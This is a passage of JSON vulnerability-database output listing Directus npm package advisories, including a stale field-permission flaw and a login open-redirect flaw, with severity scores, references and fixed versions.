elements":""}],"url":"https://github.com/advisories/GHSA-6q22-g298-grjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"r
esource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["GHSA-6q22-g298-grjh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y6cy-k9c2-pkcb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90667?format=json","vulnerability_id":"VCID-ywqb-qrvw-hfbh","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.13.0, Directus does not properly clean up field-level permissions when a field is deleted. When a field is removed from a collection, its reference in the permissions table remains intact. This stale reference creates a security gap: if another field is later created using the same name, it inherits the outdated permission entry. This behavior can unintentionally grant roles access to data they should not be able to read or modify. The issue is particularly risky in multi-tenant or production environments, where administrators may reuse field names, assuming old permissions have been fully cleared. 
Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13908","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13793","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8","reference_id":"84d7636969083387164ce5d2fd15a65e11e2d0b8","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746","reference_id":"CVE-2025-64746","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746"},{"reference_url":"https://github.com/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com
/advisories/GHSA-9x5g-62gj-wqf2"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64746","GHSA-9x5g-62gj-wqf2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ywqb-qrvw-hfbh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71813?format=json","vulnerability_id":"VCID-z5ud-p9th-mff2","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. 
The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03634","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03617","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410"},{"reference_url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"GHSA-cf45-hxwj-4cfj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"GHSA-cf45-hxwj-4cfj","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","sc
oring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:25Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35410","GHSA-cf45-hxwj-4cfj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z5ud-p9th-mff2"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@0.1.0-preview.16"}